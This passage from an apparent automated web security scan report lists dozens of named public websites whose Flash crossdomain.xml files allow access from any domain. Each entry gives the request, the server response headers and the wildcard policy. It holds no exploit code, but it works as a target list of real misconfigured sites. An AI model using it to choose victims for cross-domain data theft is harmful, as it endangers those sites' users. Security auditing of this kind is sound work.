Expires: Tue, 03 May 2011 11:22:49 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

7.62. http://www.centralmarket.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.centralmarket.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.centralmarket.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 20 Apr 2010 15:58:30 GMT
Accept-Ranges: bytes
ETag: "87369a52a2e0ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:54:33 GMT
Connection: close
Content-Length: 342

...<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy> <site-control permitted-cross-domain-policies="all"/> <allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.63. http://www.chamberorganizer.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.chamberorganizer.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.chamberorganizer.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:21:09 GMT
Server: Apache
Last-Modified: Mon, 28 Jul 2008 17:19:44 GMT
Accept-Ranges: bytes
Content-Length: 203
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

7.64. http://www.chnlove.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.chnlove.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.chnlove.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:23:47 GMT
Server: Apache
Last-Modified: Fri, 29 Oct 2010 02:41:22 GMT
ETag: "23498fd-c9-493b864d83880"
Accept-Ranges: bytes
Content-Length: 201
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

7.65. http://www.coldplay.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.coldplay.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.coldplay.com

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 08 Sep 2010 20:58:38 GMT
ETag: "175cd14-10b-48fc5c711bb80"
Vary: Accept-Encoding,User-Agent
host_mark: 00335w
Content-Type: application/xml
Server: Custom HTTP Server/1.2.3
cache-control: public, max-age = 7200
Content-Length: 267
Date: Tue, 03 May 2011 11:39:53 GMT
Age: 0
Connection: close
X-Served-By: slonj362c
X-Cache: MISS
Via: EMI Caching Servers
X-EMI: 389246590

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<allow-access-from domain="*.cooliris.com" secure="false" />
...[SNIP]...

7.66. http://www.collegeotr.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.collegeotr.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.collegeotr.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:15:42 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sat, 05 Dec 2009 20:43:00 GMT
ETag: "50e08-93-451e1d00"
Accept-Ranges: bytes
Content-Length: 147
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.67. http://www.colony1.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.colony1.net
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.colony1.net

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 02 Sep 2009 19:07:50 GMT
Accept-Ranges: bytes
ETag: "0939aa02cca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:32:55 GMT
Connection: close
Content-Length: 351

<?xml version="1.0"?>

    <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

    <cross-domain-policy>

    <allow-access-from domain="storage1.colony1.net" />

    <allow-access-from domain="*.colony1.net" />

    <allow-access-from domain="*" />
...[SNIP]...

7.68. http://www.contextads.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.contextads.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.contextads.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:45:03 GMT
Server: Apache/2.0.54 (Unix) PHP/5.0.5 mod_python/3.3.1 Python/2.4.2
Last-Modified: Wed, 21 Jul 2010 08:02:33 GMT
ETag: "3b49e8-85-48be1395ad840"
Accept-Ranges: bytes
Content-Length: 133
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8" ?>
<cross-domain-policy>
<allow-access-from domain="*" to-ports="*" />
</cross-domain-policy>

7.69. http://www.createfreepolls.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.createfreepolls.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.createfreepolls.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:24:03 GMT
ETag: W/"206-1304290207000"
Last-Modified: Sun, 01 May 2011 22:50:07 GMT
Content-Type: application/xml
Content-Length: 206
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-p
...[SNIP]...

7.70. http://www.d2jsp.org/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.d2jsp.org
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.d2jsp.org

Response

HTTP/1.0 200 OK
Content-Type: application/octet-stream
Accept-Ranges: bytes
Content-Length: 329
Connection: close
Date: Tue, 03 May 2011 10:17:08 GMT
Server: lighttpd/1.4.26

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*" to-ports="8181,8182" />
...[SNIP]...

7.71. http://www.daddario.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.daddario.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.daddario.com

Response

HTTP/1.1 200 OK
Content-Length: 297
Content-Type: text/xml
Last-Modified: Tue, 01 Sep 2009 16:14:21 GMT
Accept-Ranges: bytes
ETag: "802c81431f2bca1:38f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 12:04:16 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-http-request-headers-from domain="*" headers="*"
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

7.72. http://www.diesel.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.diesel.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.diesel.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 03 May 2010 13:37:06 GMT
ETag: "2cb0024-cb-b055e480"
Content-Type: text/xml
Date: Tue, 03 May 2011 10:38:55 GMT
Content-Length: 203
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

7.73. http://www.dishant.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.dishant.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dishant.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 20 Jun 2008 19:24:00 GMT
Accept-Ranges: bytes
ETag: "048fc30bd3c81:0"
Server: Microsoft-IIS/7.0
Date: Tue, 03 May 2011 10:28:10 GMT
Connection: close
Content-Length: 155

<?xml version="1.0"?>

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.74. http://www.donbest.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.donbest.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.donbest.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2592000
Content-Length: 204
Content-Type: text/xml
Last-Modified: Wed, 25 Aug 2010 04:07:24 GMT
Accept-Ranges: bytes
ETag: "26da376b44cb1:859"
Server: Microsoft-IIS/6.0
node: 01
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:48:12 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-pol
...[SNIP]...

7.75. http://www.dontstayin.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.dontstayin.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dontstayin.com

Response

HTTP/1.1 200 OK
Content-Length: 218
Content-Type: text/xml
Content-Location: http://www.dontstayin.com/crossdomain.xml
Last-Modified: Wed, 01 Dec 2010 10:06:50 GMT
Accept-Ranges: bytes
ETag: "24b17793f91cb1:31e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:25:47 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="true"/>
</cros
...[SNIP]...

7.76. http://www.doublegames.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.doublegames.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.doublegames.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.43
Date: Tue, 03 May 2011 10:46:20 GMT
Content-Type: text/xml; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.3.0

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.77. http://www.downy.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.downy.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.downy.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:59:43 GMT
Server: Apache
Last-Modified: Fri, 29 Apr 2011 09:00:09 GMT
ETag: "10a2b5-75-4a20ae698f840"
Accept-Ranges: bytes
Content-Length: 117
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-domain-policy>

7.78. http://www.eventsinyuma.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.eventsinyuma.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.eventsinyuma.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 03 May 2011 10:55:40 GMT
Content-Type: text/xml
Content-Length: 201
Last-Modified: Wed, 13 Feb 2008 03:19:32 GMT
Connection: keep-alive
Expires: Wed, 04 May 2011 10:55:40 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

7.79. http://www.exploregeorgia.org/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.exploregeorgia.org
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.exploregeorgia.org

Response

HTTP/1.1 200 OK
Content-Length: 228
Content-Type: text/xml
Last-Modified: Fri, 17 Oct 2008 16:27:16 GMT
Accept-Ranges: bytes
ETag: "4efcfd377530c91:422f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:00:26 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
...[SNIP]...

7.80. http://www.eyny.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.eyny.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.eyny.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "-223521001"
Last-Modified: Fri, 16 Oct 2009 07:09:28 GMT
Content-Length: 106
Connection: close
Date: Tue, 03 May 2011 10:16:54 GMT
Server: Apache/2.0.59

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.81. http://www.findire.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.findire.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.findire.com

Response

HTTP/1.1 200 OK
Content-Length: 198
Content-Type: text/xml
Last-Modified: Sat, 27 Mar 2010 07:12:30 GMT
Accept-Ranges: bytes
ETag: "083f2dc7ccdca1:3a6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:44:59 GMT
Connection: close

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*" />
   <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

7.82. http://www.firstresponse.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.firstresponse.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.firstresponse.com

Response

HTTP/1.1 200 OK
Content-Length: 210
Content-Type: text/xml
Last-Modified: Wed, 28 Jan 2009 21:05:02 GMT
Accept-Ranges: bytes
ETag: "093ec158c81c91:1e0f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:47:04 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

7.83. http://www.floorplanner.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.floorplanner.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.floorplanner.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 03 May 2011 11:36:10 GMT
Content-Type: text/xml
Connection: close
Content-Length: 368
Last-Modified: Wed, 27 Oct 2010 09:17:07 GMT
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="localhost" />
<allow-access-from domain="*.suite75.net" />
<allow-access-from domain="*.floorplanner.nl" />
<allow-access-from domain="*" />
...[SNIP]...

7.84. http://www.forconstructionpros.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.forconstructionpros.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.forconstructionpros.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:19:46 GMT
Server: Apache
Last-Modified: Mon, 08 Mar 2010 14:32:04 GMT
Accept-Ranges: bytes
Content-Length: 155
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="admin.brightcove.com" />
</cross-domain-policy>

7.85. http://www.formrouter.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.formrouter.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.formrouter.net

Response

HTTP/1.1 200 OK
Content-Length: 166
Content-Type: text/xml
Last-Modified: Tue, 21 Dec 2004 20:06:39 GMT
Accept-Ranges: bytes
ETag: "f81f09598e7c41:7f8d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:57:51 GMT
Connection: close

<?xml version="1.0"?>

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>

7.86. http://www.geckobyte.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.geckobyte.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.geckobyte.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 03 Jun 2008 19:03:38 GMT
Accept-Ranges: bytes
ETag: "ac10a887acc5c81:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:34:11 GMT
Connection: close
Content-Length: 275

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd";>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-requ
...[SNIP]...

7.87. http://www.goodbait.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.goodbait.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.goodbait.com

Response

HTTP/1.1 200 OK
Content-Length: 204
Content-Type: text/xml
Last-Modified: Tue, 04 Jan 2011 21:29:38 GMT
Accept-Ranges: bytes
ETag: "2f68e77d56accb1:2706"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:00:18 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

7.88. http://www.h2onews.org/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.h2onews.org
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.h2onews.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 09:29:50 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 13 Apr 2011 10:52:58 GMT
ETag: "d3697a2-d8-9c99b680"
Accept-Ranges: bytes
Content-Length: 216
Connection: close
Content-Type: text/xml

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cros
...[SNIP]...

7.89. http://www.helloatlanta.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.helloatlanta.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.helloatlanta.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: text/xml
Last-Modified: Tue, 08 Mar 2011 21:18:59 GMT
Accept-Ranges: bytes
ETag: "2b16b670d6ddcb1:0"
Server: Microsoft-IIS/7.5
Date: Tue, 03 May 2011 11:20:16 GMT
Connection: close
Content-Length: 103

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.90. http://www.house365.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.house365.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.house365.com

Response

HTTP/1.0 200 OK
Server: Apache
Date: Tue, 03 May 2011 10:23:43 GMT
Content-Type: text/xml; charset=gb2312
Content-Length: 100
Last-Modified: Fri, 07 Sep 2007 08:56:46 GMT
Accept-Ranges: bytes
X-Cache: MISS from cache1.house365.com
X-Cache-Lookup: MISS from cache1.house365.com:8081
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.91. http://www.hrs.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.hrs.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hrs.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Thu, 28 Apr 2011 08:39:38 GMT
Content-Type: application/xml
Content-Length: 107
Date: Tue, 03 May 2011 10:25:54 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.92. http://www.ihousenet.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ihousenet.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ihousenet.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:16:00 GMT
Server: Apache/2.2.4 (Fedora)
Vary: Host
Last-Modified: Tue, 05 Jan 2010 01:09:47 GMT
ETag: "1bb1326-8d-7e72ccc0"
Accept-Ranges: bytes
Content-Length: 141
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="iso-8859-1"?>
<cross-domain-policy>
<allow-access-from domain="*" to-ports="*" />
</cross-domain-policy>

7.93. http://www.imagetwist.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.imagetwist.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.imagetwist.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 05:23:36 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 21 Apr 2010 21:32:37 GMT
ETag: "23b81cb-d0-484c5eed1e740"
Accept-Ranges: bytes
Content-Length: 208
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

7.94. http://www.jackdaniels.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.jackdaniels.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.jackdaniels.com

Response

HTTP/1.0 200 OK
Content-Length: 222
Content-Type: text/xml
Last-Modified: Tue, 10 Feb 2009 15:38:03 GMT
Accept-Ranges: bytes
ETag: "74b88d8f958bc91:581"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:22:24 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>

...[SNIP]...

7.95. http://www.jumeirah.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.jumeirah.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.jumeirah.com

Response

HTTP/1.1 200 OK
Set-Cookie: AlteonP=ad0a051bad0a5b9cbaeeba89; path=/
Content-Length: 262
Content-Type: text/xml
Content-Location: http://www.jumeirah.com/crossdomain.xml
Last-Modified: Wed, 14 Jul 2010 03:55:32 GMT
Accept-Ranges: bytes
ETag: "092e567823cb1:1344"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:27:09 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<allow-http-request-h
...[SNIP]...

7.96. http://www.justgiving.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.justgiving.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.justgiving.com

Response

HTTP/1.1 200 OK
Content-Length: 205
Content-Type: text/xml
Last-Modified: Tue, 23 Jun 2009 19:43:20 GMT
Accept-Ranges: bytes
ETag: "03c6adc3af4c91:95c1"
Server: Microsoft-IIS/6.0
server: 192.168.110.247
X-Powered-By: ASP.NET
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Tue, 03 May 2011 11:29:55 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-pol
...[SNIP]...

7.97. http://www.kewego.fr/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.kewego.fr
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kewego.fr

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "1697549"
Last-Modified: Wed, 16 Jun 2010 12:56:54 GMT
Content-Length: 289
Connection: close
Date: Tue, 03 May 2011 11:22:32 GMT
Server: lighttpd

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow
...[SNIP]...

7.98. http://www.kibagames.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.kibagames.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, allows access from specific other domains, and allows access from specific subdomains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kibagames.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:17:12 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
Last-Modified: Fri, 10 Dec 2010 16:00:28 GMT
ETag: "141c075-4a2-4971073fbdf00"
Accept-Ranges: bytes
Content-Length: 1186
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
       <allow-access-from domain="*" />

       
       <allow-access-from domain="yig.vo.llnwd.net" />

       
<allow-access-from domain="kraloyun.com" />
<allow-access-from domain="www.kraloyun.com" />
<allow-access-from domain="spielaffe.de" />
<allow-access-from domain="www.spielaffe.de" />
<allow-access-from domain="kibagames.com" />
...[SNIP]...
<allow-access-from domain="juegosmonitos.com" />
<allow-access-from domain="www.juegosmonitos.com" />
...[SNIP]...
<allow-access-from domain="testit.kraloyun.com" />
<allow-access-from domain="testit.spielaffe.de" />
<allow-access-from domain="testit.kibagames.com" />
<allow-access-from domain="testit.juegosmonitos.com" />
<allow-access-from domain="fe2.kraloyun.dev" />
